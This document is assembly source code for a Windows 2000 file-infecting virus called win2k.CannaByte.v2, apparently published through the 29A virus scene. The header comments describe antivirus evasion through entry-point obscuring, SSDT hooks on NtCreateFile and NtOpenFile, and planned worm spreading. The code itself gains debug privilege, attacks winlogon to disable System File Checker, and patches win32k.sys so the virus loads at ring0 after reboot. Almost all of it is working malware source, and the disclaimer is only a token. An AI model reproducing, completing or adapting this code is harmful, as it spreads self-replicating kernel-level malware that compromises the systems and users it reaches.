;win2k.CannaByte.v2 coded by (Super && vallez) ; ;IMPORTANT: THIS CODE IS ONLY FOR READ AND IF YOU WANT TEST IT. IM NOT RESPONSABLE IF YOU ;USE IT FOR BAD THINGS. IN ADDITION NOW THE VIRUS WILL INFECT WIN32K.SYS AND WILL HOOK ;THE APIS BUT IT WILL INFECT ONLY ZZZ.EXE FILE SO FOR IT WORKS FULLY IT MUST BE MODIFIED. ; ;When a infected file arrives to a system it will infect the system. ;The expansion method will be to intercept NtCreateFile and NtOpenFile in SSDT, ;and infect all files that will be opened. ;For that propose,the virus will try to go ring0 and intercept there system calls. ;For going to ring0 virus will infect win32k.sys and in the next restart the virus will ;be loaded in ring0. ;Ill no explain lot of more things here coz virus is very commented so its easily ;understandable. ;version 2 improvements: ; ;Cksum of win32k.sys calculated on the fly,without using apis. ; ;RING0 EPO infection: ; ; The virus will infect in this manner: it will copy itself in reloc section,however, ; it will take RVA of relocs. Then it will add a random offset from this RVA. In addition ; reloc pointer will be erased from data directory. Avs will not able to start the ; searching from a part of PE becoz the virus could be copied to any section and any ; offset in the section. In addition the vx will infect using EPO: ; The virus will search code section where entrypoint is there. It will calculate a random ; offset from the start of the section. The offset could be between instructions..without ; pointing a valid opcode. Here the super's theory comes: ; ; Super's Theory: ; ; When u jump a random number of bytes in a buffer of code its possible u will ; jump to a zone between instruction. For example: E8 11 22 33 44 its possible ; in a random jump you will stay pointing 11 or 22 instead instruction opcode E8. ; but its possible redrive ur pointer to opcodes doing a route over the code ; getting instruction lengths and adding them to your pointer, 16 times at max. ; Then u will be in opcodes sure. ; ; The theory was full tested and it works perfectly...x86 secrets :) ; ; Well,using the theory we can redrive our pointer to a valid opcode. From that ; opcode we will search a call, E8 XX XX XX XX. We will hook that call for ; giving the control the vx. ; ; This method could be very powerfull: avs cannot search the vx at a fixed offset ; and they cannot search the call at a fixed offset. They cannot start to search ; the vx from the end of the file, becoz the virus could be far of there. ; In big hosts they will need to read lot of bytes of the host for finding the vx. ; ; We are using length disassembler engine (lde32) by Z0mbie :) We love your engine. ; ; ; Problems with EPO: we are copying the vx to a offset from relocs start. In the previous ; version the virus infected more files, it had more space for infection. Now it will ; discard more files. However infected files will be more difficult to detect. ; ; ;Other improvements we would like to add with more time: ; ; Worm support: today internet is the battlefield for vx. Well,this is my opinion: ; infector viruses are powerful, becoz they are more difficult to be detected,coverall ; if they are using methods as EPO, poli/meta-morphism, cavity...and other powerful ; techniques. However internet is succulent for viruses, and a good virus must have ; internet support. A very powerful virus would have to combine both things, a ; good infection method, difficulting detection, and a fast expansion method,using ; internet. We want to add a worm part: ; The worm part will be in ring3 sending random files from the infected machine. These ; files will be infected by the hook in the ring0 vx part. ; ; Sfc disabling: now the virus is able to disable sfc in win2k using benny and ratter ; method. It would be interesting to add new methods for disabling sfc in all systems. ; No string searching for patching better. Im sure in the next zine new methods will ; appears, more generic methods,so it would be interesting to add them. ; ; Full stealth in memory and disk: we are in ring0 hooking NtCreateFile and NtOpenFile... ; why not a full stealth in disk for win32k.sys? no time now.. :( In the same manner ; we would like to add full stealth in memory. ; ; ;THX TO: ; ;-As always Xezaw :) my dear m3nt0r ;) (THE BEST m3nt0r) I must say u thx coz that lot of ;patience that u had haven with me :) im a "ceporro" (i dont know how to say this in ;english xDD) ;-My second dear m3nt0r :) Super. How its possible u know all things i ask u? O_O xDD ;-VirusBust :) a good friend who helped me a lot of too. ;-Morphine: the most likeable girl in the undernet :D and in the world too! ;D i adore to ;speak with u :) ;Remains, ring0 machine :) ;-Pato,Nigthmare,isotope,ViR[-_-],MrHangman,Oyzzo,bi0s,... My best friends :) ;-Nmt,ur articles have helped me lot of :) ;-GriYo who always helped me too a lot of :) when i have needed. ;-Ratter&Benny: i dont know u but i must say ur articles and virus codes have helped me ;lot of very much.(When i added this line in parenthesys i already knew ratter and i must ;say thx again for ur help ;) ;-Z0mbie: ur engine is a boom!! :D ;-Well,"THX TO" part is the more difficult part to code coz always u will forget to thx ;somebody so i must say thx all people that i forget to put here :) ;-And OfCorz a infinitely BIG THX TO 'Lady Marian' :********************* U r resident ;in my memory all time :D .586p .model flat,stdcall extrn ExitProcess:proc extrn GetLastError:proc extrn GetModuleHandleA:proc ;29a files include mz.inc include pe.inc include win32api.inc include useful.inc ;macros ;;;;;;;;;;;;;;;;;;;;;;; callz macro dir_call db 0E8h dd (dir_call - $ - 4) endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; jmpz macro dir_call db 0E9h dd (dir_call - $ -4) endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; CalcLenString macro local loopin push esi dec esi loopin: inc esi cmp byte ptr[esi],0 jne loopin mov ecx,esi pop esi sub ecx,esi endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; GezApi macro BaseKernel,ApiCRC,ApiNameLen mov eax,BaseKernel mov edx,ApiCRC mov ebx,ApiNameLen callz GetApi endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; GezSyscall macro BaseNtdll,ApiCRC,ApiNameLen GezApi BaseNtdll,ApiCRC,ApiNameLen mov eax,[eax + 1] endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; syscallz macro fc,paramz ;from Ratter's win2k.Joss mov eax,fc lea edx,[esp] int 2eh add esp,(paramz*4) endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; Writez macro BaseKernel,hProcess,OffsetInProc,Buffer,Size push 0 mov [esp],esp ;for storing number of writted bytes push Size push Buffer push OffsetInProc push hProcess GezApi BaseKernel,WriteMemoryProcessCRC,WMPNameLen call eax endm ;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;; Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size push 0 mov [esp],esp ;for storing number of read bytes push Size push Buffer push OffsetInProc push hProcess GezApi BaseKernel,ReadMemoryProcessCRC,RMPNameLen call eax endm ;;;;;;;;;;;;;;;;;;;;;;; ;APIS'S NAMES CRCS AND LENGHTS LoadLibraryACRC equ 3fc1bd8dh LLNameLen equ 12 CloseHandleCRC equ 0b09315f4h CHNameLen equ 11 FindFirstFileACRC equ 0c9ebd5ceh FFFNameLen equ 14 FindNextFileACRC equ 75272948h FNFNameLen equ 13 FindCloseCRC equ 0d82bf69ah FCNameLen equ 9 GetTickCountCRC equ 5b4219f8h GTCNameLen equ 12 WriteMemoryProcessCRC equ 4f58972eh WMPNameLen equ 18 ReadMemoryProcessCRC equ 0f7c7ae42h RMPNameLen equ 17 ResumeThreadCRC equ 3872beb9h RTNameLen equ 12 ExitProcessCRC equ 251097CCh EPNameLen equ 11 SetFileAttributesACRC equ 156b9702h SFANameLen equ 18 CreateFileACRC equ 553b5c78h CFNameLen equ 11 CreateFileMappingACRC equ 0b41b926ch CFMNameLen equ 18 MapViewOfFileCRC equ 0A89b382fh MVFNameLen equ 13 UnmapViewOfFileCRC equ 391ab6afh UVFNameLen equ 15 SetFileTimeCRC equ 21804a03h SFTNameLen equ 11 GetModuleHandleACRC equ 0B1866570h GMHNameLen equ 16 GetLastErrorCRC equ 0d2e536b7h GLENameLen equ 12 RegisterServiceProcessCRC equ 3b5ef61fh RSPNameLen equ 22 SetCurrentDirectoryACRC equ 69b6849fh SCDNameLen equ 20 GetCurrentDirectoryACRC equ 0c79dc4e3h GCDNameLen equ 20 GetWindowsDirectoryACRC equ 0fff372beh GWDNameLen equ 20 GetModuleFileNameACRC equ 08bff7a0h GMFNNameLen equ 18 CreateProcessACRC equ 0a851d916h CPNameLen equ 14 Module32FirstCRC equ 38891c00h M32FNameLen equ 13 Module32NextCRC equ 0f6911852h M32NNameLen equ 12 CreateToolhelp32SnapShotCRC equ 0c1f3b876h CT32SNameLen equ 24 VirtualProtectExCRC equ 5d180413h VPNameLen equ 16 GetCurrentProcessCRC equ 0d0861aa4h GCPNameLen equ 17 OpenProcessTokenCRC equ 0f9c60615h OPTNameLen equ 16 LookupPrivilegeValueACRC equ 0da87bf62h LPVNameLen equ 21 AdjustTokenPrivilegesCRC equ 0de3e5cfh ATPNameLen equ 21 EnumProcessesCRC equ 0509a21ch EPSNameLen equ 13 EnumProcessModulesCRC equ 0dea82ac2h EPMNameLen equ 18 GetModuleInformationCRC equ 0f2a84636h GMINameLen equ 20 SuspendThreadCRC equ 0bd76ac31h STNameLen equ 13 FreeLibraryCRC equ 0da68238fh FLNameLen equ 11 GetVersionCRC equ 4ccf1a0fh GVNameLen equ 10 RasDialACRC equ 0b88da156h RDNameLen equ 8 GetModuleBaseNameACRC equ 1720513eh GMBNNameLen equ 18 OpenProcessCRC equ 0df27514bh OPNameLen equ 11 ZwConnectPortCRC equ 0cbaec255h ZCPNameLen equ 13 NtConnectPortCRC equ 0c88edce9h NCPNameLen equ 13 ZwRequestPortCRC equ 0e28aebd1h ZRPNameLen equ 13 DbgUiConnectToDbgCRC equ 09a51ac3ah DUCTDNameLen equ 17 DbgSsInitializeCRC equ 0d198b351h DSINameLen equ 15 DbgSsHandleKmApiMsgCRC equ 2e9c4e99h DSHKAMNameLen equ 19 GetCurrentProcessIdCRC equ 1db413e3h GCPINameLen equ 19 GetCurrentThreadIdCRC equ 8df87e63h GCTINameLen equ 18 WaitForDebugEventCRC equ 96ab83a1h WFDENameLen equ 17 ContinueDebugEventCRC equ 0d8e77e49h CDENameLen equ 18 VirtualAllocExCRC equ 0e62e824dh VANameLen equ 14 CreateRemoteThreadCRC equ 0ff808c10h CRTNameLen equ 18 NtTerminateProcessCRC equ 94fcb0c0h NTPNameLen equ 18 ExitThreadCRC equ 80af62e1h ETNameLen equ 10 GetCurrentDirectoryWCRC equ 334971b2h GCDWNameLen equ 20 FindFirstFileWCRC equ 3d3f609fh FFFWNameLen equ 14 SleepCRC equ 0cef2eda8h SNameLen equ 5 MoveFileACRC equ 0de9ff0d1h MFNameLen equ 9 MapFileAndCheckSumACRC equ 462eeff7h MFACSNameLen equ 19 CheckSumMappedFileCRC equ 0bbb4966eh CSMFNameLen equ 18 CopyFileACRC equ 0199dc99h CpFNameLen equ 9 KeServiceDescriptorTableCRC equ 32a4d557h KSDTNameLen equ 24 NtCreateFileCRC equ 3ee6cc56h NCFNameLen equ 12 ZwOpenFileCRC equ 0b679c176h ZOFNameLen equ 10 ZwOpenSectionCRC equ 73bdfd70h ZOSNameLen equ 13 ZwMapViewOfSectionCRC equ 0d287ee26h ZMVOSNameLen equ 18 ZwCloseCRC equ 180c0d23h ZCNameLen equ 7 ZwCreateSectionCRC equ 2c919477h ZCSNameLen equ 15 ZwUnmapViewOfSectionCRC equ 9d35f923h ZUVOSNameLen equ 20 NtOpenFileCRC equ 0a1b1dc21h NOFNameLen equ 10 ZwDeleteFileCRC equ 6967772dh ZDFNameLen equ 12 DeleteFileACRC equ 919b6bcbh DFNameLen equ 11 ZwCreateFileCRC equ 0a81a7cd4h ZCFNameLen equ 12 PsCreateSystemThreadCRC equ 32adfc3ah PCSTNameLen equ 20 KeQueryTickCountCRC equ 52d6480eh KQTCNameLen equ 16 Kernel32CRC equ 204c64e5h ;CRC of 'kernel32' string TOKEN_PRIVILEGES struc TP_count dd ? TP_luid dq ? TP_attribz dd ? TOKEN_PRIVILEGES ends unicode_string struc us_Length dw ? us_MaximumLength dw ? us_Buffer dd ? unicode_string ends objects_attributes struc oa_length dd ? ;lenght of this structure oa_rootdir dd ? oa_objectname dd ? ;name of the object oa_attribz dd ? ;attributes of the object oa_secdesc dd ? oa_secqos dd ? objects_attributes ends pio_status struc ps_ntstatus dd ? ps_info dd ? pio_status ends TOKEN_ASSIGN_PRIMARY equ 00000001h TOKEN_DUPLICATE equ 00000002h TOKEN_IMPERSONATE equ 00000004h TOKEN_QUERY equ 00000008h TOKEN_QUERY_SOURCE equ 00000010h TOKEN_ADJUST_PRIVILEGES equ 00000020h TOKEN_ADJUST_GROUPS equ 00000040h TOKEN_ADJUST_DEFAULT equ 00000080h TOKEN_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED or \ TOKEN_ASSIGN_PRIMARY or \ TOKEN_DUPLICATE or \ TOKEN_IMPERSONATE or \ TOKEN_QUERY or \ TOKEN_QUERY_SOURCE or \ TOKEN_ADJUST_PRIVILEGES or \ TOKEN_ADJUST_GROUPS or \ TOKEN_ADJUST_DEFAULT SE_PRIVILEGE_ENABLED equ 00000002h CHECKSUM_SUCCESS equ 00000000h CHECKSUM_OPEN_FAILURE equ 00000001h CHECKSUM_MAP_FAILURE equ 00000002h CHECKSUM_MAPVIEW_FAILURE equ 00000003h CHECKSUM_UNICODE_FAILURE equ 00000004h OBJ_CASE_INSENSITIVE equ 00000040h FILE_DIRECTORY_FILE equ 00000001h FILE_WRITE_THROUGH equ 00000002h FILE_SEQUENTIAL_ONLY equ 00000004h FILE_NO_INTERMEDIATE_BUFFERING equ 00000008h FILE_SYNCHRONOUS_IO_ALERT equ 00000010h FILE_SYNCHRONOUS_IO_NONALERT equ 00000020h FILE_NON_DIRECTORY_FILE equ 00000040h FILE_CREATE_TREE_CONNECTION equ 00000080h FILE_COMPLETE_IF_OPLOCKED equ 00000100h FILE_NO_EA_KNOWLEDGE equ 00000200h FILE_OPEN_FOR_RECOVERY equ 00000400h FILE_RANDOM_ACCESS equ 00000800h FILE_DELETE_ON_CLOSE equ 00001000h FILE_OPEN_BY_FILE_ID equ 00002000h FILE_OPEN_FOR_BACKUP_INTENT equ 00004000h FILE_NO_COMPRESSION equ 00008000h FILE_RESERVE_OPFILTER equ 00100000h FILE_OPEN_REPARSE_POINT equ 00200000h FILE_OPEN_NO_RECALL equ 00400000h FILE_OPEN_FOR_FREE_SPACE_QUERY equ 00800000h FILE_COPY_STRUCTURED_STORAGE equ 00000041h FILE_STRUCTURED_STORAGE equ 00000441h FILE_VALID_OPTION_FLAGS equ 00ffffffh FILE_VALID_PIPE_OPTION_FLAGS equ 00000032h FILE_VALID_MAILSLOT_OPTION_FLAGS equ 00000032h FILE_VALID_SET_FLAGS equ 00000036h FILE_SHARE_READ equ 00000001h FILE_SHARE_WRITE equ 00000002h FILE_READ_DATA equ 00000001h FILE_WRITE_DATA equ 00000002h FILE_APPEND_DATA equ 00000004h FILE_OPEN_IF equ 00000003h FILE_OPEN equ 00000001h FILE_NON_DIRECTORY_FILE equ 00000040h STATUS_SUCCESS equ 00000000h SEC_COMMIT equ 08000000h SECTION_QUERY equ 00000001h SECTION_MAP_WRITE equ 00000002h SECTION_MAP_READ equ 00000004h SECTION_MAP_EXECUTE equ 00000008h SECTION_EXTEND_SIZE equ 00000010h STANDART_RIGTHS_REQUIRED equ 000F0000h SYNCHRONIZE equ 00100000h THREAD_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED + SYNCHRONIZE + 3FFh) STARTUPINFOSIZE equ 68 PROCESSINFORMATIONSIZE equ 16 cPushfd equ 4 tamvirus = evirus - svirus .data; ;;;;;; az db 'KeQueryTickCount',0 azz db 'WriteProfileStringA',0 vallez db 'vallez for 29a',0 .code; ;;;;;; start: ;;;;;; ;first generation codevvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv xor ebp,ebp lea esi,az CalcLenString mov edi,ecx call CRC32 lea esi,azz CalcLenString mov edi,ecx call CRC32 ;unprotection of code for first gen @pushsz "kernel32.dll" call GetModuleHandleA push eax mov esi,offset svirus mov ecx,evirus - svirus xor ebx,ebx callz UnprotectMem ;This small code will move all code 1 byte up for simulate second gen... lea edi,[evirus] mov esi,edi dec esi mov ecx,evirus-svirus std rep movsb cld mov byte ptr[svirus],90h pop eax mov [ebp + NtKernel],eax jmp svirus ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;first generation code^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ;XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv ;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv ;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv ;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv ;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv ;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv ;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv svirus: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Entry Point Of Virus when is executed In ring3. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; EPointFile: pushad pushfd int 3 ;;;;;;;;;;;;;;;;;;;;;;;; call d_offset ;I calculate delta offset d_offset: pop ebp sub ebp,offset d_offset ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,dword ptr fs:[30h] ;we ll get kernel address mov eax,dword ptr [eax+0ch] mov esi,dword ptr [eax+1ch] lodsd mov eax,dword ptr [eax+08h] ;eax->addr in kernel xor ax,ax ;Ill get kernel address add eax,1000h ;eax -> a part of kernel32 SearchKernel: sub eax,1000h cmp word ptr [eax],'ZM' jne SearchKernel ;eax -> base of kernel32 ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; push eax ;i have unprotected the memory of code of virus lea esi,[ebp + svirus] mov ecx,tamvirus xor ebx,ebx callz UnprotectMem ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; pop eax ;I get other used librarys mov [ebp + NtKernel],eax callz GetLibrarys ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtKernel] ;Ill keep the current directory GezApi eax,GetCurrentDirectoryACRC,GCDNameLen lea ebx,[ebp + CurDir] push ebx push 256 call eax;we keep current dir for restoring ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov ecx,cs ;The virus will work in win2k only xor cl,cl or ecx,ecx jne Exit mov eax,[ebp + NtKernel] ;Im in NT but i want win2k... GezApi eax,GetVersionCRC,GVNameLen call eax test eax,80000000h jnz Exit cmp al,5 ;i test for win2k(i think XP is 5 too but it will not work jne Exit ;for win XP) ;Im not sure if this will work in NT previous machines perhaps but ill code for win2k. ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtKernel] ;we go to system32 directory first GezApi eax,GetWindowsDirectoryACRC,GWDNameLen push 256 lea ebx,[ebp + Buffer] push ebx call eax lea esi,[ebp + Buffer] CalcLenString mov edi,esi add edi,ecx mov al,'\' stosb mov eax,'tsys' stosd mov eax,'23me' stosd xor al,al mov [edi],al mov eax,[ebp + NtKernel] GezApi eax,SetCurrentDirectoryACRC,SCDNameLen lea esi,[ebp + Buffer] push esi call eax ;;;;;;;;;;;;;;;;;;;;;;;; ;I want to enable Debug privilege for token of this user. touch_privilege was coded by Ratter ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtAdvapi] ;enabling debug privilege for this user GezApi eax,AdjustTokenPrivilegesCRC,ATPNameLen mov [ebp + tAdjustTokenPrivileges],eax mov eax,[ebp + NtKernel] GezApi eax,CloseHandleCRC,CHNameLen mov [ebp + tCloseHandle],eax mov eax,[ebp + NtAdvapi] GezApi eax,LookupPrivilegeValueACRC,LPVNameLen mov [ebp + tLookupPrivilegeValueA],eax mov eax,[ebp + NtAdvapi] GezApi eax,OpenProcessTokenCRC,OPTNameLen mov [ebp + tOpenProcessToken],eax mov eax,[ebp + NtKernel] GezApi eax,GetCurrentProcessCRC,GCPNameLen mov [ebp + tGetCurrentProcess],eax push SE_PRIVILEGE_ENABLED pop eax @pushsz "SeDebugPrivilege" pop esi call touch_privilege ;;;;;;;;;;;;;;;;;;;;;;;; ;Now ill disable sfp with Benny&Ratter method ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; callz GetWinlogon ;I have debug priv so ill disable sfc with benny&ratter method or eax,eax jnz Exit callz AttackWinlogon or eax,eax jnz Exit ;;;;;;;;;;;;;;;;;;;;;;;; ;Now infection of win32k.sys ;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;U will see in this part lot of move and copy files but i do it for ensuring the ;perfect working of the virus...I had some problems with sfc disabling due this code ;was executed before sfc disabling code so finally win32k.sys was not infected the first ;time that virus was executed in that system uninfected still...but i have correct that ;problem doing some movings and copyings of files...that file here,that file there and ;virus works perfectly now ;P ;;;;;;;;;;;;;;;;;;;;;;;; lea eax,[ebp + _WIN32_FIND_DATA] ;Search win32k.sy push eax lea eax,[ebp + win32ksy] push eax mov eax,[ebp + NtKernel] GezApi eax,FindFirstFileACRC,FFFNameLen call eax cmp eax,0FFFFFFFFh je NoWin32sySoContinue push eax mov eax,[ebp + NtKernel] GezApi eax,FindCloseCRC,FCNameLen call eax lea esi,[ebp + win32ksys] push esi mov eax,[ebp + NtKernel] ;deleting win32k.sys if it would exist GezApi eax,DeleteFileACRC,DFNameLen call eax mov eax,[ebp + NtKernel] ;renaming win32k.sy to win32k.sys GezApi eax,MoveFileACRC,MFNameLen lea esi,[ebp + win32ksys] push esi lea esi,[ebp + win32ksy] push esi call eax ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; NoWin32sySoContinue: mov eax,[ebp + NtKernel] ;we copy win32k.sys to win32k.fuck GezApi eax,CopyFileACRC,CpFNameLen push 0 lea esi,[ebp + win32kfuck] push esi lea esi,[ebp + win32ksys] push esi call eax ;;;;;;;;;;;;;;;;;;;;;;;; ;Why of this?: ;The original win32k.sys is been used by the system so we can modify it...however we can ;change its name. We copy it to win32k.fuck and infect the .fuck file... ;later we renaming win32k.sys to win32k.sy and win32k.fuck to win32k.sys ;and this new win32k.sys will be loaded in ring0 the next time that system reboot. ;i copy .sys to .fuck for no infecting directly over win32k.sys ;coz i had problems...i tried to infect directly over win32k.sys but sometimes(lot of times) ;when i called functions as CreateFile or others, i got this error from GetLastError: ;32(20h)(The process cannot access the file because it is being used by another process) ;I supposed that win32k.sys is a file used lot of times and if i infected directly over ;win32k.sys i would get this error lot of times....so finally i decided to do a copy ;named win32k.fuck for later renaming this file to win32k.sys when already infected. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Now ill infect win32k.fuck ;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; lea eax,[ebp + _WIN32_FIND_DATA] ;Mapping win32k.fuck push eax lea eax,[ebp + win32kfuck] push eax mov eax,[ebp + NtKernel] GezApi eax,FindFirstFileACRC,FFFNameLen call eax mov [ebp + SearchHand],eax cmp eax,0FFFFFFFFh je Exit callz MapFile or eax,eax jz Exit ;;;;;;;;;;;;;;;;;;;;;;;; ;INFECTION OF WIN32K.FUCK ;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + ViewHandle] ;a simple infection overwriting reloc section mov edx,eax mov ebx,[eax + 3ch] add eax,ebx ;eax -> PE mov bx,word ptr [eax + 8] cmp bx,'zs' je StopInfection ;becoz already Infected mov word ptr [eax + 8],'zs' ;a small mark ;) mov ebx,[eax + 28h] ;EPoint of win32k.sys mov [ebp + EntryPointWin32ksys],ebx xor ecx,ecx mov cx,word ptr [eax + 6] dec ecx mov ebx,eax add ebx,0F8h ;sections GoToLastSection: add ebx,28h loop GoToLastSection ;ebx -> .reloc ;over-reloc infection of win32k.sys cmp [ebx],'ler.' jne StopInfection mov dword ptr [ebx + 24h],040000040h ;reloc not discardable,readable,writable mov ecx,[ebx + 10h] cmp ecx,tamvirus jb StopInfection ;i change entry point of win32k.sys mov edi,[ebx + 0ch] add edi,EPointSystem - svirus mov [eax + 28h],edi ;RVA new entry point for win32k.sys ;ill copy the code overwriting .reloc mov edi,[ebx + 14h] add edi,edx lea esi,[ebp + svirus] mov ecx,tamvirus rep movsb ;;;;;;;;;;;;;;;;;;;;;;;; ;IMPORTANT: I MUST CORRECT WIN32K.FUCK HEADER CKSUM AFTER INFECTION OR SYSTEM WILL NOT START ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; ;In the previous version of the virus the cksum of win32k.sys was calculated with ;MapFileAndCheckSumA api. In this version we will calculate it on the fly. mov esi,[ebp + ViewHandle] ;esi->start of buffer lea ecx,[ebp + _WIN32_FIND_DATA] mov ecx,[ecx.WFD_nFileSizeLow] shr ecx,1 ;ecx=len of total buf in words for calculating the cksum mov ebx,[esi + 3ch] add ebx,esi lea edx,[ebx.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_CheckSum] ;edx=addr of dword for skipping xor edi,edi ;in edi will be the resulting cksum CalcCksum: cmp esi,edx jne ContinueCksum add esi,4 sub ecx,2 jmp CalcCksum ContinueCksum: push eax movzx eax,word ptr [esi] add edi,eax pop eax add esi,2 test edi,0FFFF0000h jz ContinueCksum2 inc edi and edi,0000FFFFh ContinueCksum2: loop CalcCksum lea ecx,[ebp + _WIN32_FIND_DATA] mov ecx,[ecx.WFD_nFileSizeLow] add edi,ecx mov [ebx.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_CheckSum],edi ;calculated cksum ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,'szsz' StopInfection: ;Unmmaping win32k.fuck push eax callz CloseAll pop eax cmp eax,'szsz' jne SysAlreadyInfected ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; push dword ptr [ebp + SearchHand] ;Closing the search hand mov eax,[ebp + NtKernel] GezApi eax,FindCloseCRC,FCNameLen call eax ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtKernel] ;renaming win32k.sys to win32k.sy GezApi eax,MoveFileACRC,MFNameLen lea esi,[ebp + win32ksy] push esi lea esi,[ebp + win32ksys] push esi call eax ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; mov eax,[ebp + NtKernel] ;renaming win32k.fuck to win32k.sys GezApi eax,MoveFileACRC,MFNameLen lea esi,[ebp + win32ksys] push esi lea esi,[ebp + win32kfuck] push esi call eax ;;;;;;;;;;;;;;;;;;;;;;;; ;Exit ;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; Exit: mov eax,[ebp + NtKernel] ;Exit from virus code... GezApi eax,SetCurrentDirectoryACRC,SCDNameLen lea esi,[ebp + CurDir] push esi call eax ;we restore current directory. callz FreeLibrarys ;free librarys loaded. or ebp,ebp ;first generation exit, ExitProcess. jnz gen2Exit push 0 call ExitProcess gen2Exit: mov eax,[ebp + EntryPoint] mov dword ptr [ebp + dirHook],eax popfd popad push 12345678h dirHook equ $-4 ret ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;; SysAlreadyInfected: lea esi,[ebp + win32kfuck] push esi mov eax,[ebp + NtKernel] ;deleting win32k.fuck if it would exist GezApi eax,DeleteFileACRC,DFNameLen call eax jmpz Exit ;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 